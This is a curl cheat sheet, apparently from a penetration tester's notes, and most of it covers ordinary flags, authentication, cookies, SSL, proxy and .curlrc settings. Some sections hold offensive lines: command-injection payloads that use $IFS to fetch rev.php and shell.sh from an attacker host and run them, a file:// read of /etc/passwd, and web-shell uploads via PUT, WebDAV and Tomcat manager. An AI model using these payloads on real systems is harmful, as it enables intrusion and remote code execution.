Curl

Common commands

#   -d, --data            HTTP POST data
#   -f, --fail            Fail silently (no output at all) on HTTP errors
#   -i, --include         Include protocol response headers in the output
#   -o, --output          Write to file instead of stdout
#   -O, --remote-name     Write output to a file named as the remote file
#   -s, --silent          Silent mode
#   -T, --upload-file     Transfer local FILE to destination
#   -A, --user-agent      Send User-Agent <name> to server
#   -v, --verbose         Make the operation more talkative
#   -V, --version         Show version number and quit
#   -u, --user <user:password>  Server user and password

## ------------------| Read local files
curl file:///etc/passwd

## ------------------| Execute commands
curl http://10.10.14.26/$(whoami)
curl http://10.10.14.26/$(which$IFS'curl')
curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/var/www/html/rev.php'$IFS'http://10.10.14.26/rev.php')   
curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/tmp/shell.sh'$IFS'http://10.10.14.26/shell.sh')
curl http://10.10.14.26/$(bash$IFS/tmp/shell.sh)

## ------------------| Basic
curl -L http://h4rithd.com                        ### Follow redirects
curl -I http://h4rithd.com                        ### Fetch headers only
curl -O http://h4rithd.com/file.txt.              ### Download a file with its original name
curl -o b.zip http://h4rithd.com/a.zip            ### Download file and rename
curl -C - -O http://h4rithd.com/a.zip             ### Resume an interrupted download
curl --compressed http://h4rithd.com              ### Request compressed response (gzip, deflate)
curl -4 http://h4rithd.com                        ### Force IPv4
curl -6 http://h4rithd.com                        ### Force IPv6

## ------------------| Authentication
curl -u username:password http://h4rithd.com      ### Basic authentication
curl --basic -u user:pass http://h4rithd.com      ### Explicitly use basic authentication
curl --digest -u user:pass http://h4rithd.com     ### Digest authentication
curl --ntlm -u user:pass http://h4rithd.com       ### NTLM authentication

## ------------------| Cookies
curl -b cookies.txt http://h4rithd.com            ### Send cookies from a file
curl -c cookies.txt http://h4rithd.com            ### Save received cookies to a file
curl -b "name=value" http://h4rithd.com           ### Send cookies inline

## ------------------| Uploading Files
curl -T file.txt ftp://h4rithd.com/               ### Upload a file to FTP
curl -T file.txt -u user:pass ftp://h4rithd.com/  ### Upload with authentication
curl -F "[email protected]" http://h4rithd.com/upload   ### Upload file with multipart form

## ------------------| Debugging & Verbose Output
curl -v http://h4rithd.com                        ### Verbose output (see request/response headers)
curl -i http://h4rithd.com                        ### Show response headers
curl -s http://h4rithd.com                        ### Silent mode (no progress output)
curl --trace trace.txt http://h4rithd.com         ### Save request/response trace to a file
curl --trace-ascii trace.txt http://h4rithd.com   ### ASCII-only trace file

## ------------------| Rate Limiting & Timeout
curl --limit-rate 100k http://h4rithd.com/a.zip   ### Limit download speed
curl --max-time 10 http://h4rithd.com             ### Timeout after 10 seconds
curl --connect-timeout 5 http://h4rithd.com       ### Timeout if connection takes more than 5 seconds

## ------------------| Handling SSL & Certificates
curl -k https://h4rithd.com                       ### Ignore SSL certificate errors
curl --cacert ca.pem https://h4rithd.com          ### Use a custom CA certificate
curl --ssl-reqd ftp://h4rithd.com/                ### Require SSL/TLS for FTP
curl --cert client.pem --key client.key https://h4rithd.com ### Use client certificate authentication

## ------------------| Parallel Requests
curl -Z http://h4rithd.com/a http://h4rithd.com/b      ### Download multiple files in parallel
curl -O http://h4rithd.com/a -O http://h4rithd.com/b   ### Download multiple files sequentially

## ------------------| Handling FTP
curl -u user:pass ftp://h4rithd.com/file.txt            ### Download a file via FTP
curl -u user:pass -T file.txt ftp://h4rithd.com/        ### Upload a file via FTP
curl -u user:pass ftp://h4rithd.com/ -Q "DELE file.txt" ### Delete a file via FTP

Use PUT command to upload file

curl -X PUT http://10.10.10.15/h4rithd.html -d @shell.aspx
curl -X PUT http://10.10.10.15/harith.txt --data-binary @cmdasp.aspx

# If DEV available ?
curl -u 'username:password' --upload-file shell.php http://10.10.10.67/webdav_test_inception/shell.php 
curl -u 'username:password' -X PUT http://10.10.10.67/webdav_test_inception/shell.php --data-binary @shell.php        

# Upload war file to tomcat
curl -u 'username:password' -T shell.war http://10.10.10.10:8080/manager/text/deploy?path=/h4rithd

Use MOVE command to move file

curl -X MOVE http://10.10.10.15/h4rithd.html -H 'Destination:http://10.10.10.15/h4rithd.aspx'

.curlrc file

## ------------------| Basic Settings
user-agent = "Mozilla/5.0"               ### Set a default User-Agent
referer = "https://h4rithd.com"          ### Set a default Referer
header = "X-Custom-Header: myvalue"      ### Set a custom header
compressed                               ### Enable gzip/deflate compression by default
location                                 ### Follow redirects
max-time = 30                            ### Set a timeout for requests (seconds)
connect-timeout = 10                     ### Timeout for connection attempts (seconds)
retry = 3                                ### Number of retry attempts on transient errors
ipv4                                     ### Force using IPv4
ipv6                                     ### Force using IPv6
fail                                     ### Fail silently on HTTP errors
silent                                   ### Suppress progress output
output = "output.txt"                    ### Save response to a file by default

## ------------------| Authentication & Credentials
user = "username:password"               ### Set default credentials for authentication
proxy-user = "proxyuser:proxypass"       ### Set credentials for a proxy server
netrc                                    ### Use .netrc for authentication

## ------------------| Proxy Settings
proxy = "http://127.0.0.1:8080"          ### Set an HTTP proxy
proxy = "socks5://127.0.0.1:1080"        ### Use a SOCKS5 proxy
noproxy = "localhost,127.0.0.1,a.com"    ### Exclude domains from proxy usage

## ------------------| SSL & Certificates
insecure                                 ### Ignore SSL certificate validation errors
cacert = "/path/to/cacert.pem"           ### Specify a custom CA certificate
cert = "/path/to/client.crt"             ### Specify a client certificate
key = "/path/to/client.key"              ### Specify a private key file

## ------------------| Cookie & Session Management
cookie = "name=value"                    ### Set default cookies
cookie-jar = "/path/to/cookies.txt"      ### Save cookies after execution
cookie-file = "/path/to/cookies.txt"     ### Load cookies from a file

## ------------------| Debugging & Logging
verbose                                  ### Enable verbose mode for debugging
trace = "/path/to/trace.log"             ### Save request/response trace to a file
trace-ascii = "/path/to/trace.txt"       ### Save ASCII-only trace output

Last updated 2 months ago

Was this helpful?

# -d, --data HTTP POST data # -f, --fail Fail silently (no output at all) on HTTP errors # -i, --include Include protocol response headers in the output # -o, --output Write to file instead of stdout # -O, --remote-name Write output to a file named as the remote file # -s, --silent Silent mode # -T, --upload-file Transfer local FILE to destination # -A, --user-agent Send User-Agent <name> to server # -v, --verbose Make the operation more talkative # -V, --version Show version number and quit # -u, --user <user:password> Server user and password ## ------------------| Read local files curl file:///etc/passwd ## ------------------| Execute commands curl http://10.10.14.26/$(whoami) curl http://10.10.14.26/$(which$IFS'curl') curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/var/www/html/rev.php'$IFS'http://10.10.14.26/rev.php') curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/tmp/shell.sh'$IFS'http://10.10.14.26/shell.sh') curl http://10.10.14.26/$(bash$IFS/tmp/shell.sh) ## ------------------| Basic curl -L http://h4rithd.com ### Follow redirects curl -I http://h4rithd.com ### Fetch headers only curl -O http://h4rithd.com/file.txt. ### Download a file with its original name curl -o b.zip http://h4rithd.com/a.zip ### Download file and rename curl -C - -O http://h4rithd.com/a.zip ### Resume an interrupted download curl --compressed http://h4rithd.com ### Request compressed response (gzip, deflate) curl -4 http://h4rithd.com ### Force IPv4 curl -6 http://h4rithd.com ### Force IPv6 ## ------------------| Authentication curl -u username:password http://h4rithd.com ### Basic authentication curl --basic -u user:pass http://h4rithd.com ### Explicitly use basic authentication curl --digest -u user:pass http://h4rithd.com ### Digest authentication curl --ntlm -u user:pass http://h4rithd.com ### NTLM authentication ## ------------------| Cookies curl -b cookies.txt http://h4rithd.com ### Send cookies from a file curl -c cookies.txt http://h4rithd.com ### Save received cookies to a file curl -b "name=value" http://h4rithd.com ### Send cookies inline ## ------------------| Uploading Files curl -T file.txt ftp://h4rithd.com/ ### Upload a file to FTP curl -T file.txt -u user:pass ftp://h4rithd.com/ ### Upload with authentication curl -F "[email protected]" http://h4rithd.com/upload ### Upload file with multipart form ## ------------------| Debugging & Verbose Output curl -v http://h4rithd.com ### Verbose output (see request/response headers) curl -i http://h4rithd.com ### Show response headers curl -s http://h4rithd.com ### Silent mode (no progress output) curl --trace trace.txt http://h4rithd.com ### Save request/response trace to a file curl --trace-ascii trace.txt http://h4rithd.com ### ASCII-only trace file ## ------------------| Rate Limiting & Timeout curl --limit-rate 100k http://h4rithd.com/a.zip ### Limit download speed curl --max-time 10 http://h4rithd.com ### Timeout after 10 seconds curl --connect-timeout 5 http://h4rithd.com ### Timeout if connection takes more than 5 seconds ## ------------------| Handling SSL & Certificates curl -k https://h4rithd.com ### Ignore SSL certificate errors curl --cacert ca.pem https://h4rithd.com ### Use a custom CA certificate curl --ssl-reqd ftp://h4rithd.com/ ### Require SSL/TLS for FTP curl --cert client.pem --key client.key https://h4rithd.com ### Use client certificate authentication ## ------------------| Parallel Requests curl -Z http://h4rithd.com/a http://h4rithd.com/b ### Download multiple files in parallel curl -O http://h4rithd.com/a -O http://h4rithd.com/b ### Download multiple files sequentially ## ------------------| Handling FTP curl -u user:pass ftp://h4rithd.com/file.txt ### Download a file via FTP curl -u user:pass -T file.txt ftp://h4rithd.com/ ### Upload a file via FTP curl -u user:pass ftp://h4rithd.com/ -Q "DELE file.txt" ### Delete a file via FTP

curl -X PUT http://10.10.10.15/h4rithd.html -d @shell.aspx curl -X PUT http://10.10.10.15/harith.txt --data-binary @cmdasp.aspx # If DEV available ? curl -u 'username:password' --upload-file shell.php http://10.10.10.67/webdav_test_inception/shell.php curl -u 'username:password' -X PUT http://10.10.10.67/webdav_test_inception/shell.php --data-binary @shell.php # Upload war file to tomcat curl -u 'username:password' -T shell.war http://10.10.10.10:8080/manager/text/deploy?path=/h4rithd

## ------------------| Basic Settings user-agent = "Mozilla/5.0" ### Set a default User-Agent referer = "https://h4rithd.com" ### Set a default Referer header = "X-Custom-Header: myvalue" ### Set a custom header compressed ### Enable gzip/deflate compression by default location ### Follow redirects max-time = 30 ### Set a timeout for requests (seconds) connect-timeout = 10 ### Timeout for connection attempts (seconds) retry = 3 ### Number of retry attempts on transient errors ipv4 ### Force using IPv4 ipv6 ### Force using IPv6 fail ### Fail silently on HTTP errors silent ### Suppress progress output output = "output.txt" ### Save response to a file by default ## ------------------| Authentication & Credentials user = "username:password" ### Set default credentials for authentication proxy-user = "proxyuser:proxypass" ### Set credentials for a proxy server netrc ### Use .netrc for authentication ## ------------------| Proxy Settings proxy = "http://127.0.0.1:8080" ### Set an HTTP proxy proxy = "socks5://127.0.0.1:1080" ### Use a SOCKS5 proxy noproxy = "localhost,127.0.0.1,a.com" ### Exclude domains from proxy usage ## ------------------| SSL & Certificates insecure ### Ignore SSL certificate validation errors cacert = "/path/to/cacert.pem" ### Specify a custom CA certificate cert = "/path/to/client.crt" ### Specify a client certificate key = "/path/to/client.key" ### Specify a private key file ## ------------------| Cookie & Session Management cookie = "name=value" ### Set default cookies cookie-jar = "/path/to/cookies.txt" ### Save cookies after execution cookie-file = "/path/to/cookies.txt" ### Load cookies from a file ## ------------------| Debugging & Logging verbose ### Enable verbose mode for debugging trace = "/path/to/trace.log" ### Save request/response trace to a file trace-ascii = "/path/to/trace.txt" ### Save ASCII-only trace output